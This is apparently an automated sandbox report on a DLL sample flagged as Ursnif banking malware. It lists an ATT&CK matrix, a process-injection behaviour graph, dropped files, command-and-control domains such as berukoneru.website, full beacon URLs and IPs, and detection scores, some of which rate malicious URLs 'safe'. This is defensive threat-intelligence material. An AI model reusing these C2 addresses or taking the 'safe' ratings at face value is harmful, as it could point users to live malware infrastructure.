            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 539457 Sample: 6.png Startdate: 14/12/2021 Architecture: WINDOWS Score: 100 103 Found malware configuration 2->103 105 Yara detected  Ursnif 2->105 107 Machine Learning detection for sample 2->107 109 5 other signatures 2->109 9 loaddll32.exe 1 2->9         started        13 mshta.exe 2->13         started        15 mshta.exe 2->15         started        17 2 other processes 2->17 process3 dnsIp4 97 windows.update3.com 9->97 99 berukoneru.website 9->99 101 2 other IPs or domains 9->101 131 Writes to foreign memory regions 9->131 133 Writes or reads registry keys via WMI 9->133 135 Writes registry values via WMI 9->135 19 cmd.exe 1 9->19         started        21 regsvr32.exe 1 9->21         started        25 rundll32.exe 9->25         started        27 BackgroundTransferHost.exe 13 9->27         started        29 powershell.exe 13->29         started        32 powershell.exe 15->32         started        34 powershell.exe 17->34         started        36 powershell.exe 17->36         started        signatures5 process6 dnsIp7 38 rundll32.exe 19->38         started        83 berukoneru.website 79.110.52.144, 443, 49795, 49796 V4ESCROW-ASRO Romania 21->83 85 windows.update3.com 21->85 87 prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com 18.219.227.107, 443, 49772, 49773 AMAZON-02US United States 21->87 111 Writes to foreign memory regions 21->111 113 Writes or reads registry keys via WMI 21->113 115 Writes registry values via WMI 21->115 42 control.exe 21->42         started        89 windows.update3.com 25->89 117 System process connects to network (likely due to code injection or exploit) 25->117 44 control.exe 25->44         started        71 C:\Users\user\AppData\...\nigogz4l.cmdline, UTF-8 29->71 dropped 119 Modifies the context of a thread in another process (thread injection) 29->119 121 Maps a DLL or memory area into another process 29->121 123 Creates a thread in another existing process (thread injection) 29->123 46 csc.exe 29->46         started        53 2 other processes 29->53 49 csc.exe 32->49         started        51 conhost.exe 32->51         started        55 2 other processes 34->55 57 2 other processes 36->57 file8 signatures9 process10 dnsIp11 91 3.12.124.139, 443, 49775, 49778 AMAZON-02US United States 38->91 93 windows.update3.com 38->93 95 2 other IPs or domains 38->95 125 System process connects to network (likely due to code injection or exploit) 38->125 127 Writes to foreign memory regions 38->127 129 Writes registry values via WMI 38->129 59 control.exe 38->59         started        73 C:\Users\user\AppData\Local\...\nigogz4l.dll, PE32 46->73 dropped 61 cvtres.exe 46->61         started        75 C:\Users\user\AppData\Local\...\nlbomp32.dll, PE32 49->75 dropped 63 cvtres.exe 49->63         started        77 C:\Users\user\AppData\Local\...\dtnsoflb.dll, PE32 53->77 dropped 79 C:\Users\user\AppData\Local\...\uu5u2nmv.dll, PE32 55->79 dropped 65 cvtres.exe 55->65         started        81 C:\Users\user\AppData\Local\...\wklr4juq.dll, PE32 57->81 dropped 67 cvtres.exe 57->67         started        file12 signatures13 process14 process15 69 rundll32.exe 59->69         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            6.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            4.2.rundll32.exe.f10000.1.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            SourceDetectionScannerLabelLink
            windows.update3.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on0%Avira URL Cloudsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://berukoneru.website/tyi0%Avira URL Cloudsafe
            https://berukoneru.website/tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta0%Avira URL Cloudsafe
            http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
            https://windows.update3.com/0%Avira URL Cloudsafe
            http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
            https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ0%Avira URL Cloudsafe
            https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html0%Avira URL Cloudsafe
            https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY0%Avira URL Cloudsafe
            https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta0%Avira URL Cloudsafe
            https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT0%Avira URL Cloudsafe
            https://berukoneru.website/0%Avira URL Cloudsafe
            http://constitution.org/usdeclar.txt0%URL Reputationsafe
            https://berukoneru.website/O0%Avira URL Cloudsafe
            https://berukoneru.website/BS0%Avira URL Cloudsafe
            https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta0%Avira URL Cloudsafe
            https://berukoneru.website/tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta0%Avira URL Cloudsafe
            https://berukoneru.website/j0%Avira URL Cloudsafe
            https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD60%Avira URL Cloudsafe
            https://berukoneru.website/tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta0%Avira URL Cloudsafe
            https://nodejs.org00%Avira URL Cloudsafe
            https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCA0%Avira URL Cloudsafe
            https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL0%Avira URL Cloudsafe
            https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta0%Avira URL Cloudsafe
            https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZv0%Avira URL Cloudsafe
            https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/650%Avira URL Cloudsafe
            https://berukoneru.website/jP0%Avira URL Cloudsafe
            https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta0%Avira URL Cloudsafe
            https://berukoneru.website/LAp0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
            		18.219.227.107
            		truefalse
              		high
              berukoneru.website
              		79.110.52.144
              		truetrue
                		unknown
                windows.update3.com
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://berukoneru.website/tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.etatrue
                • Avira URL Cloud: safe
                		unknown
                https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.etatrue
                • Avira URL Cloud: safe
                		unknown
                https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.etatrue
                • Avira URL Cloud: safe
                		unknown
                https://berukoneru.website/tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.etatrue
                • Avira URL Cloud: safe
                		unknown
                https://berukoneru.website/tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.etatrue
                • Avira URL Cloud: safe
                		unknown
                https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.etatrue
                • Avira URL Cloud: safe
                		unknown
                https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.etatrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://aka.ms/MicrosoftEdgeDownload&quot;loaddll32.exe, 00000000.00000003.317624845.0000000001398000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316267329.00000000033D1000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.316701420.00000000008F1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmpfalse
                  		high
                  https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onregsvr32.exe, 00000002.00000003.362160768.00000000033C0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://berukoneru.website/tyirundll32.exe, 00000003.00000003.362882057.00000000008D7000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmpfalse
                    		high
                    http://constitution.org/usdeclar.txtC:loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://windows.update3.com/regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://https://file://USER.ID%lu.exe/updloaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQregsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsloaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmpfalse
                      		high
                      https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.htmlrundll32.exe, 00000004.00000003.338607112.0000000000FF3000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmpfalse
                        		high
                        https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYrundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtTrundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/rundll32.exe, 00000003.00000003.364039010.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.372813489.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.523369955.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://constitution.org/usdeclar.txtloaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://berukoneru.website/Orundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/BSregsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/jregsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6rundll32.exe, 00000004.00000003.372839349.0000000000FF2000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://nodejs.org06.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAloaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjLregsvr32.exe, 00000002.00000003.372829342.000000000335B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZvregsvr32.exe, 00000002.00000003.361178760.000000000335B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65regsvr32.exe, 00000002.00000003.362615512.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/jPregsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363514151.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/LAprundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        79.110.52.144
                        		berukoneru.websiteRomania
                        		60233V4ESCROW-ASROtrue
                        18.219.227.107
                        		prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                        		16509AMAZON-02USfalse
                        3.12.124.139
                        		unknownUnited States
                        		16509AMAZON-02UStrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:539457
                        Start date:14.12.2021
                        Start time:10:32:11
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 14m 6s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:6.png (renamed file extension from png to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:50
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winDLL@59/52@16/4
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 90.2% (good quality ratio 86.1%)
                        • Quality average: 78.9%
                        • Quality standard deviation: 28.8%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 57
                        • Number of non-executed functions: 20
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 2.20.205.172
                        • Excluded domains from analysis (whitelisted): assets.msn.com, client.wns.windows.com, www.microsoft.com-c-3.edgekey.net, fs.microsoft.com, store-images.s-microsoft.com, e13678.dscb.akamaiedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, microsoft.com, arc.msn.com, www.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        10:33:33API Interceptor6x Sleep call for process: regsvr32.exe modified
                        10:33:33API Interceptor11x Sleep call for process: rundll32.exe modified
                        10:33:46API Interceptor5x Sleep call for process: loaddll32.exe modified
                        10:34:20API Interceptor248x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        79.110.52.14461b85f75e6a7c.dllGet hashmaliciousBrowse
                          18.219.227.107justifika Payment details.exeGet hashmaliciousBrowse
                          • www.midiapopular.com/g0s6/?fTyPr=G9VVADPYFn+AmxEBtj41RQ2VeI17x3XgqdLKfQ02dI5IVwX1QNn558ISmc/fCk4C/0Zf&I4ah=w2MTqnnpWZSPKVw0
                          Pedido.exeGet hashmaliciousBrowse
                          • www.flexsupplychain.com/d17y/?0rZP=OmVFy8OLQw4Gp9JzKyep83yL4HSb/lijK6/1gM7i85D6SqIxyGpApTTHLP2WXKAWPC8w&0Pzhp=yTe4ShzxzhvLNrf
                          shedy.exeGet hashmaliciousBrowse
                          • www.w6ef2.rest/sy20/?IvC=xs0F11qeGlDb3CqwQ31iFoqJ6gZSv9pqRXHO06OK2OaZwbm3xdnECHW1XX4Ap/B0LhPG&P2M=j0Gtn6WPbPNLw
                          3.12.124.139justifika Payment details.exeGet hashmaliciousBrowse
                          • www.midiapopular.com/g0s6/?fTyPr=G9VVADPYFn+AmxEBtj41RQ2VeI17x3XgqdLKfQ02dI5IVwX1QNn558ISmc/fCk4C/0Zf&t48=rZAh

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          berukoneru.website61b85f75e6a7c.dllGet hashmaliciousBrowse
                          • 79.110.52.144
                          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com61b85f75e6a7c.dllGet hashmaliciousBrowse
                          • 3.12.124.139
                          justifika Payment details.exeGet hashmaliciousBrowse
                          • 18.219.227.107
                          Pedido.exeGet hashmaliciousBrowse
                          • 18.219.227.107
                          shedy.exeGet hashmaliciousBrowse
                          • 18.219.227.107
                          Tax payment invoice - Saturday, November 29, 2021,pdf.exeGet hashmaliciousBrowse
                          • 3.12.124.139
                          PKWvT2Siyf.exeGet hashmaliciousBrowse
                          • 3.14.206.87
                          BZfCJr1SBC.exeGet hashmaliciousBrowse
                          • 3.22.144.145
                          Ez6r9fZIXc.exeGet hashmaliciousBrowse
                          • 3.136.35.220
                          20211511.docGet hashmaliciousBrowse
                          • 3.14.206.87
                          Swift Copy MT103.exeGet hashmaliciousBrowse
                          • 3.14.206.87
                          KC5w2SJOpt.exeGet hashmaliciousBrowse
                          • 3.142.112.3
                          Pnfl0Fu5gE.exeGet hashmaliciousBrowse
                          • 3.20.112.42
                          DBS_Swift $12,863.exeGet hashmaliciousBrowse
                          • 18.116.226.211
                          PO# 11381.exeGet hashmaliciousBrowse
                          • 3.130.243.177
                          OXkB3xMeAr.exeGet hashmaliciousBrowse
                          • 3.133.163.136
                          Exq3dXFDHe.exeGet hashmaliciousBrowse
                          • 18.116.226.211
                          Quotation 29092021.exeGet hashmaliciousBrowse
                          • 3.133.163.136
                          1 Balance_PI Dt. 21.9.2021.xlsxGet hashmaliciousBrowse
                          • 13.58.168.69
                          HBW PAYMENT LIST FOR 2021,20210809.xlsxGet hashmaliciousBrowse
                          • 3.139.183.122
                          2021091400983746_pdf.exeGet hashmaliciousBrowse
                          • 3.133.163.136

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          AMAZON-02US61b85f75e6a7c.dllGet hashmaliciousBrowse
                          • 3.12.124.139
                          9hPGWxrcih.dllGet hashmaliciousBrowse
